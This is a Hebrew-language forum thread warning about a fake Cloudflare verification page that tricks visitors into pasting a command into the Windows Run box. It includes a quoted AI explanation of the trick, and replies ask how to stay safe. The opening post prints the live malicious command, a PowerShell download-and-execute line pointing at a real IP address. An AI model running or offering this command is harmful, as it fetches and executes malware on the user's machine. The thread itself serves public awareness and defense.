מידע שימושי זהירות! וירוס בתחפושת!

[משה פפירוב]

ניסיתי להכנס לאתר של הרב אפרתי - נותן הכשרות
לאחר לחיצה על סימון - אתה לא רובוט...

הופתעתי מאוד לראות את זה:

נראה חשוד!

מאוד חשוד!!!

ספוילר: הסבר מגיימני למה זה וירוס

‫Gemini אמר​

אזהרה: מדובר בהונאה ובתוכנה זדונית (Malware)​

התמונה שצירפת מציגה דף מזויף שמתחזה לשירות ההגנה Cloudflare, אך למעשה מדובר בשיטה להרצת קוד זדוני על המחשב שלך.

למה זה מסוכן?​

ההוראות בתמונה מבקשות ממך לבצע רצף פעולות חריג מאוד:

1. צירוף המקשים Win + R: פותח את חלון ה-"הפעלה" (Run) של ווינדוס, שמשמש להרצת פקודות מערכת.
2. צירוף המקשים Ctrl + V: מדביק פקודה שהאתר העתיק ללוח הגזירים (Clipboard) שלך באופן אוטומטי ברגע שנכנסת לדף או לחצת על כפתור.
3. לחיצה על OK: מריצה את הפקודה המודבקת.

מה קורה בפועל?ברגע שתלחץ על OK, המחשב יריץ פקודה (בדרך כלל פקודת PowerShell) שמורידה ומתקינה וירוס, תוכנת כופר או תוכנה לגניבת סיסמאות ופרטי בנק. אף שירות אימות לגיטימי (כמו Cloudflare) לא יבקש ממך להריץ פקודות ידניות בחלון ה-Run של המערכת.

---

מה עליך לעשות?​

• אל תבצע את ההוראות: אל תקיש על שום שילוב מקשים ואל תדביק דבר.
• סגור את הלשונית מיד: צא מהאתר הזה ואל תחזור אליו.
• סריקת וירוסים: מומלץ להריץ סריקה מלאה של האנטי-וירוס במחשב שלך (כמו Windows Defender או תוכנה מוכרת אחרת) ליתר ביטחון.
• ניקוי היסטוריה: כדאי לנקות את הקבצים הזמניים והקוקיז בדפדפן.

בדקתי בלוח מה הפקודה שהוא רצה שאני אריץ במחשב....
זה הפקודה: powershell -c iex(irm 158.94.209.33 -UseBasicParsing) - סכנה! לא להריץ בשום אופן!!!!

תקראו טוב מה גיימני כותב שזה עושה למחשב שלכם...

זהירות! מדובר בתוכנה זדונית (Malware) ודאית.​

הפקודה שהעתקת היא הוכחה חותכת לכך שמדובר בניסיון פריצה. בוא נפרק את הפקודה כדי שתבין בדיוק מה היא מנסה לעשות למחשב שלך:

• powershell: מפעיל את ממשק הפקודות המתקדם של ווינדוס. לממשק זה יש הרשאות עמוקות לשינוי הגדרות מערכת.
• iex (Invoke-Expression): פקודה שאומרת למחשב: "כל מה שתקבל בהמשך – תריץ אותו כקוד עכשיו".
• irm (Invoke-RestMethod): פקודה להורדת תוכן מהאינטרנט.
• 158.94.209.33: זוהי כתובת IP של שרת מרוחק (שאינו קשור ל-Cloudflare). הפקודה מנסה למשוך קובץ "תסריט" (Script) מהשרת הזה.
• -UseBasicParsing: הוראה לדפדפן הפנימי להתעלם מבדיקות תאימות ולהריץ את הקוד במהירות.

---

מה המשמעות?​

ברגע שהיית לוחץ על OK, המחשב שלך היה פונה לכתובת ה-IP הזו, מוריד קוד זדוני (כמו סוס טרויאני או תוכנת כופר) ומריץ אותו מיד ברקע, בלי שתראה חלון נוסף או אזהרה.

צעדים דחופים אם כבר הרצת את הפקודה:​

1. ניתוק מהאינטרנט: כבה את ה-Wi-Fi או נתק את כבל הרשת מיד כדי למנוע מהווירוס לשלוח מידע החוצה או להוריד רכיבים נוספים.
2. סריקה במצב בטוח: הפעל את המחשב ב-"מצב בטוח" (Safe Mode) והרץ סריקה מלאה של אנטי-וירוס מעודכן.
3. שינוי סיסמאות: ממכשיר אחר (טלפון או מחשב נקי), שנה סיסמאות לחשבונות רגישים (מייל, בנק, רשתות חברתיות).

אוסיף שבדקתי את הכתובת שהפקודה פונה אליה
באתר בדיקת כתובות אינטרנט - האם הן וירוס
הנה הקישור לבדיקה: https://www.virustotal.com/gui/url/bd5456fb856d9b4d0d4cea1c68edf7e1793e6a72fb9ac037f4f05d1bba65c18c
מוזמנים לראות את התוצאה....

מסקנה:

זהירות!!!

 

[משה פפירוב]

מקפיץ

 

[משה פפירוב]

בגלל שזה וירוס שנפוץ מאוד - יש את אותו דבר בהמון מקומות שונים
ובכולם אותו עיקרון - אני מקפיץ שוב
ואני חושב שכדאי לשתף לאחרים - להציל מנזק

 

[net13]

חומרה - פריצה?

נכנסתי לאתר הזה: https://nadlanone.co.il/ הוא ביקש שאריץ פקודה כדי לזהות שהחיבור מאובטח: עשיתי מה שכתוב וההרצה היתה כזו: ולחצתי אישור. אחרי כמה דקות קלטתי שאולי זה וירוס או תוכנה זדונית וכו'. ניתקתי את האינטרנט. הרצתי הרצה מהירה של האנטי וירוס של מייקרוסופט. ואחר כך הרצתי את האנטי וירוס של...

www.prog.co.il

 

[Uניק]

אל תכנסו לאתר בכלל, גם אם לא מציג את ההוראה - מוריד מאחורי הקלעים קובץ זדוני

 

[100 אחוז]

איך אפשר להישמר ממנו?

 

[חיה4]

אמאלה כמה פשוט ככה מתוחכם!
יישר כח על העלאה למודעות.
ממש חשוב.

 

[משה פפירוב]

איך אפשר להישמר ממנו?

לא להריץ בחיים שום תוכנה/קוד שאתה לא יודע בדיוק מה עושה/מי שנתן לך יודע

 

[גזעי]

אל תכנסו לאתר בכלל, גם אם לא מציג את ההוראה - מוריד מאחורי הקלעים קובץ זדוני

אי אפשר להוריד מאחורי הקלעים בדפדפנים מודרניים...

 

[100 אחוז]

לא להריץ בחיים שום תוכנה/קוד שאתה לא יודע בדיוק מה עושה/מי שנתן לך יודע

מה זה להריץ?
כמו מה?

 

[net13]

מי שעשה מאוד חשוב למחוק קבצי TEMP

 

[משה פפירוב]

מה זה להריץ?
כמו מה?

להריץ = להפעיל

 

[100 אחוז]

להריץ = להפעיל

לא להפעיל כמנהל מערכת או סתם?

 

[Uניק]

אי אפשר להוריד מאחורי הקלעים בדפדפנים מודרניים...

אני לא יודעת, אבל עובדה שרק נכנסתי לקישור דרך החיפוש גוגל במחשב של העבודה - ומייד התקשרו אלי אלה שמנטרים את הרשת להגיד שהם רואים קובץ זדוני... לא יודעת מה הם עשו עם זה, אבל עובדה שהם ראו

 

[ליטאי פשוט]

איך אפשר להישמר ממנו?

לא להפעיל שום דבר מחוץ לדפדפן, פשוט וקל

 

[100 אחוז]

לא להפעיל שום דבר מחוץ לדפדפן, פשוט וקל

מה זה נקרא מחוץ לדפדפן בעברית מדוברת?

 

[ליטאי פשוט]

מה זה נקרא מחוץ לדפדפן בעברית מדוברת?

"מחוץ לדפדפן" פירושו להפעיל תוכנה או אפליקציה באופן עצמאי ישירות על המחשב או הטלפון, מבלי להיכנס אליה דרך אתר אינטרנט.

 

[Uניק]

מה זה נקרא מחוץ לדפדפן בעברית מדוברת?

גוגל

 

[גזעי]

אני לא יודעת, אבל עובדה שרק נכנסתי לקישור דרך החיפוש גוגל במחשב של העבודה - ומייד התקשרו אלי אלה שמנטרים את הרשת להגיד שהם רואים קובץ זדוני... לא יודעת מה הם עשו עם זה, אבל עובדה שהם ראו

הקובץ הזדוני הוא האתר עצמו (שכן יורד למחשב, אבל לא יכול להריץ שום דבר מחוץ לדפדפן)

 

[משה פפירוב]

לא להפעיל כמנהל מערכת או סתם?

גם וגם